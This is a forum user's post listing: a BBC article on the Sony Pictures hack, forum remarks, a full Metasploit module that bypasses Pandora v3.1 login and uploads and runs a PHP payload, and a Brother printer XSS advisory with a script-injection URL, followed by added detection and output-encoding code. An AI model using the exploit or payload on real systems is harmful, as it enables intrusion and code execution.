zpimp

Posts posted by zpimp

  1. Congratulations on the initiative, but still, take it easier with the spam here (all those "bump", "I made an update", "I changed the image" posts don't look good). It's just a piece of advice!

    Good luck going forward with the project.

  2. There was no precedent for how to deal with a hacking attack on the scale of that which hit Sony Pictures, its chief executive has said.

    Michael Lynton said his firm had "no playbook" on how to respond.

    In a wide-ranging interview with the Associated Press, he also described the scale of the attack, which the US government has blamed on North Korea.

    But one security expert said that Sony should have spotted the danger and prepared contingency plans.

    Lynton said that, immediately after the attack came to light, his company scrambled to restore communications, digging out old phones and working out how to pay staff with paper cheques.

    'Adequately prepared'

    "We are the canary in the coal mine, that's for sure," he told the Associated Press.

    "There's no playbook for this, so you are in essence trying to look at the situation as it unfolds and make decisions without being able to refer to a lot of experiences you've had in the past or other people's experiences. You're on completely new ground."

    And he told the agency of the scale of the data loss his company had suffered.

    "They came in the house, stole everything, then burned down the house. They destroyed servers, computers, wiped them clean of all the data and took all the data."

    He insisted his firm was "adequately prepared" but "just not for an attack of this nature", which he said that no firm could have withstood.

    After a series of embarrassing leaks, the hackers threatened further attacks over Sony Pictures' film The Interview, which imagined the assassination of North Korean leader Kim Jong-un.

    Several cinemas refused to show it on its planned Christmas day debut and Sony Pictures pulled the film altogether.

    But it was later released online. Lynton insisted that the studio always planned some sort of release but did not know how to carry it out.

    He said he called Google's chief executive Eric Schmidt, who told him: "This is what we've been waiting for."

    Schmidt agreed to help get the film out on Google Play and YouTube. Sony built its own website and Microsoft's Xbox and Apple's iTunes also ultimately agreed to release the film, Lynton said.

    "We probably in retrospect should have said we're exploring other options, because that's exactly what we were doing."

    'Damage control'

    But, according to security expert Brian Honan of BH Consulting, his company should have been better prepared and should have detected such a large data loss.

    "It is hard to understand how more than 100 terabytes of data would leave someone's network undetected."

    He pointed out that it was not the first assault on Sony's systems and said the company could have been better prepared to deal with both the attack and its fallout.

    He suggested that, in the light of lawsuits brought by Sony Pictures employees over the loss of their personal data, Lynton's comments could be "damage control".

    He said the Sony Pictures chief executive could be "trying to use the fact that the FBI has said it was the North Korean state and super cyber-ninjas, that an ordinary company using ordinary defences would not be able to defend itself".

    "If he can say they took reasonable precautions, they cannot be blamed," he told the BBC.

    FBI director James Comey insisted North Korea was behind the attack

    Lynton's comments came after the FBI director James Comey said his agency was sure North Korea was behind the attack because the hackers "got sloppy".

    "In nearly every case, [the hackers] used proxy servers to disguise where they were coming from in sending these emails and posting these statements. But several times they got sloppy.

    "Several times, either because they forgot or because of a technical problem, they connected directly and we could see that the IPs they were using… were exclusively used by the North Koreans."

    You can find the article at: BBC News - Sony boss: 'No playbook' for dealing with hack attack

  3. Anonymous does not exist and will not exist; they are just kids who break into the website of a bakery, a car wash, who-knows-whose blog. Besides, the title has nothing to do with the content of the first post: the title says "Anonymous will disappear", while the content says they will take revenge on the sites of Arabs and Muslims. Honestly, there's no point..

  4. ##
    # This module requires Metasploit: http//metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::FileDropper

      def initialize(info={})
        super(update_info(info,
          'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
          'Description' => %q{
            This module exploits an authentication bypass vulnerability in Pandora v3.1 as
            disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
            upload which allows a user to upload arbitrary files to the '/images/' directory.

            This module was created as an exercise in the Metasploit Mastery Class at Blackhat
            that was facilitated by egypt and mubix.

          },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'Juan Galiana Lara', # Vulnerability discovery
              'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module
              'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
              'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module
              '_flood <freshbones[at]gmail.com>', # Metasploit module
              'mubix <mubix[at]room362.com>', # Auth bypass and file upload
              'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload
            ],
          'References' =>
            [
              ['CVE', '2010-4279'],
              ['OSVDB', '69549'],
              ['BID', '45112']
            ],
          'Platform' => 'php',
          'Arch' => ARCH_PHP,
          'Targets' =>
            [
              ['Automatic Targeting', { 'auto' => true }]
            ],
          'Privileged' => false,
          'DisclosureDate' => "Nov 30 2010",
          'DefaultTarget' => 0))

        register_options(
          [
            OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
          ], self.class)
      end

      def check

        base = target_uri.path

        # retrieve software version from login page
        begin
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => normalize_uri(base, 'index.php')
          })
          if res and res.code == 200
            #Tested on v3.1 Build PC100609 and PC100608
            if res.body.include?("v3.1 Build PC10060")
              return Exploit::CheckCode::Appears
            elsif res.body.include?("Pandora")
              return Exploit::CheckCode::Detected
            end
          end
          return Exploit::CheckCode::Safe
        rescue ::Rex::ConnectionError
          print_error("#{peer} - Connection failed")
        end
        return Exploit::CheckCode::Unknown

      end

      # upload a payload using the pandora built-in file upload
      def upload(base, file, cookies)
        data = Rex::MIME::Message.new
        data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
        data.add_part("Go", nil, nil, 'form-data; name="go"')
        data.add_part("images", nil, nil, 'form-data; name="directory"')
        data.add_part("1", nil, nil, 'form-data; name="upload_file"')
        data_post = data.to_s
        data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(base, 'index.php'),
          'cookie' => cookies,
          'ctype' => "multipart/form-data; boundary=#{data.bound}",
          'vars_get' => {
            'sec' => 'gsetup',
            'sec2' => 'godmode/setup/file_manager',
          },
          'data' => data_post
        })

        register_files_for_cleanup(@fname)
        return res
      end

      def exploit

        base = target_uri.path
        @fname = "#{rand_text_numeric(7)}.php"
        cookies = ""

        # bypass authentication and get session cookie
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(base, 'index.php'),
          'vars_get' => {
            'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',
            'loginhash_user' => 'admin',
            'loginhash' => '1',
          },
        })

        # fix if logic
        if res and res.code == 200
          if res.body.include?("Logout")
            cookies = res.get_cookies
            print_status("Login Bypass Successful")
            print_status("cookie monster = " + cookies)
          else
            fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
          end
        end

        # upload PHP payload to images/[fname]
        print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
        php = %Q|<?php #{payload.encoded} ?>|
        begin
          res = upload(base, php, cookies)
        rescue ::Rex::ConnectionError
          fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
        end

        if res and res.code == 200
          print_good("#{peer} - File uploaded successfully")
        else
          fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
        end

        # retrieve and execute PHP payload
        print_status("#{peer} - Executing payload (images/#{@fname})")
        begin
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => normalize_uri(base, 'images', "#{@fname}")
          }, 1)
        rescue ::Rex::ConnectionError
          fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
        end

      end
    end

    http://packetstormsecurity.com/files/129830/Pandora-3.1-Auth-Bypass-Arbitrary-File-Upload.html
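
For defenders, the three requests the module above sends (hash-based login, file-manager upload, then a `.php` file fetched from `images/`) leave a recognisable trail in web server access logs. The following is an added detection sketch, not part of the original post or of the Metasploit project; the log lines are constructed samples in combined log format and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log; client IPs are from documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2015:10:00:01 +0000] "GET /pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jan/2015:10:00:02 +0000] "POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager HTTP/1.1" 200 4210
198.51.100.7 - - [10/Jan/2015:10:00:03 +0000] "GET /pandora_console/images/4821907.php HTTP/1.1" 200 0
203.0.113.20 - - [10/Jan/2015:10:05:00 +0000] "GET /pandora_console/index.php?sec=estado HTTP/1.1" 200 9000
203.0.113.20 - - [10/Jan/2015:10:05:04 +0000] "GET /pandora_console/images/logo.png HTTP/1.1" 200 1200
"""

# client IP, then method and request target from the quoted request line
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
CHAIN = ["hash_login", "file_manager_upload", "php_under_images"]

def classify(method, target):
    """Map one request to a stage of the sequence shown in the module, or None."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if url.path.endswith("/index.php"):
        if "loginhash" in query and "loginhash_data" in query:
            return "hash_login"
        if method == "POST" and query.get("sec2") == ["godmode/setup/file_manager"]:
            return "file_manager_upload"
    # Any script served out of the upload directory deserves a look.
    if method == "GET" and re.search(r"/images/[^/]+\.php$", url.path):
        return "php_under_images"
    return None

def suspicious_clients(log_text):
    """Return {client_ip: [stages seen, in first-seen order]} for flagged clients."""
    stages = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target = m.groups()
        stage = classify(method, target)
        if stage and stage not in stages[ip]:
            stages[ip].append(stage)
    return dict(stages)

if __name__ == "__main__":
    for ip, seen in suspicious_clients(SAMPLE_LOG).items():
        print(ip, "FULL CHAIN" if seen == CHAIN else "partial", seen)
```

A client showing all three stages in order warrants checking the `images/` directory for unexpected `.php` files; a single stage on its own is a weaker signal.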

  5. Class: Cross-Site Scripting
    Remote: Yes
    Disclosed: 9th October 2014
    Published: 7th January 2015
    Credit: Dave Daly of Dionach (vulns@dionach.com)
    Confirmed Vulnerable: Brother MFC-J4410DW with F/W Versions J and K

    The printer administration web application on Brother MFC-J4410DW model printers with firmware versions older than version L (released 18th December 2014) is susceptible to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser.

    F/W Versions J and K have been confirmed as vulnerable. Other versions may also be vulnerable.

    The vulnerability affects all pages which accept the "url" querystring parameter. The following proof-of-concept example demonstrates this, using the "status" web page.

    http://[printer]/general/status.html?url="/><script>alert("XSS!")</script><input type="hidden" value="

    The vendor was notified of this issue in October 2014, and has reported that the vulnerability is addressed in the latest firmware version.

    Source: http://packetstormsecurity.com/files/129841/Brother-MFC-J4410DW-Cross-Site-Scripting.html
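
The proof-of-concept in the advisory above closes a double-quoted attribute and then opens a new tag, which is what unencoded reflection into an attribute value looks like. The following added example (not from the advisory or the vendor's firmware) contrasts that with attribute encoding plus a local-path allowlist; the hidden-input sink is an assumption inferred from the shape of the PoC, and all function names are hypothetical.

```python
import html
import re
from html.parser import HTMLParser

# Value of the "url" parameter taken from the advisory's proof-of-concept.
POC_VALUE = '"/><script>alert("XSS!")</script><input type="hidden" value="'

TEMPLATE = '<input type="hidden" name="url" value="%s"/>'  # assumed sink
SAFE_PATH = re.compile(r"^/[A-Za-z0-9_\-./]*$")            # local paths only

def render_vulnerable(url_param):
    # Raw reflection: a double quote in the input ends the attribute early.
    return TEMPLATE % url_param

def render_encoded(url_param):
    # Attribute encoding: quotes and angle brackets become character references.
    return TEMPLATE % html.escape(url_param, quote=True)

def render_hardened(url_param):
    # Validate first (reject anything that is not a plain local path,
    # including scheme-relative "//host" values), then encode on output.
    if not SAFE_PATH.match(url_param) or url_param.startswith("//"):
        url_param = "/"
    return render_encoded(url_param)

class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    """Return the element names an HTML parser sees in the markup."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.tags

if __name__ == "__main__":
    print(tags_in(render_vulnerable(POC_VALUE)))  # injected element present
    print(tags_in(render_encoded(POC_VALUE)))     # single input element
    print(render_hardened("/general/status.html"))
```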
